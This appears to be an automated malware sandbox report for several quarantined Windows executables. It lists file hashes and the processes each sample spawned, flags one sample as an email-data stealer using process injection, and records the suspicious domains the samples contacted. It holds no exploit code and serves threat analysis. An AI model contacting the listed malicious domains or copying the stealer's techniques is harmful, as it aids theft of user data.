"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,17353931213807846027,7682948131491992179,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4912 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

\??\pipe\LOCAL\crashpad_5092_WVNZWYKNJEBNBCPS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6c79e94ad2036a8b2e71d7a8d740bc06
SHA1 b7d288dd22eb2ba1d381cbb3bbb331dab197182b
SHA256 2d1d4f8de6b9af94455631ce907243355ed02307a63ce48c8ea95e0e250a49b7
SHA512 84a183f444254157749e4130e4f31fc31c594aa183eb3fa7dfcfeda1f7d9729cd3b88ff6d4a4ac2de1e95d727d1ef823439f803b2f417be55cab6bfcbfd1fef9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 67e28e2fdb5e4e1e2ec96e9a46344d3f
SHA1 61b72929feab739db69af1205998ae1986381039
SHA256 d4fd5719d33de7086b562390e03e89d5543122b442d73cf2d9f39e16f55e156b
SHA512 0e60eddc670d849f46e3bb60a104615a8f95c0a0c9983f6e9875c4fd5953d4102ffc98480b527042b7b64a3eb629699a924b8f674207ff80620109d3f678d90b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2713cf4e2633aa1d32a7f0d49372a125
SHA1 a14634b7251cdfea9ea04cf2940d392c5b6e9732
SHA256 1406e72f31141b5892389fc4a68699afbc45e95b932fbbee51c3da8e3ff7808d
SHA512 54e39811b350429d13c789b2ee153b025d462c28fd23352317e0d9c42893cd5f17feb90acef580e6388b7df8b734c0e6d9239716e38fee958cdfe94237717f82

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\0frhMAb.exe"

Network

N/A

Files

memory/2528-0-0x000000013F7D0000-0x000000013F97E000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4500 set thread context of 4876 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4500 -ip 4500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 776

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.112.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4500-0-0x0000000074D7E000-0x0000000074D7F000-memory.dmp

memory/4500-1-0x0000000000DE0000-0x0000000000E48000-memory.dmp

memory/4500-2-0x0000000005CC0000-0x0000000006264000-memory.dmp

memory/4876-4-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4876-6-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4500-7-0x0000000074D70000-0x0000000075520000-memory.dmp

memory/4876-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4876-9-0x0000000000400000-0x000000000045E000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

100s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1232 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1232 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

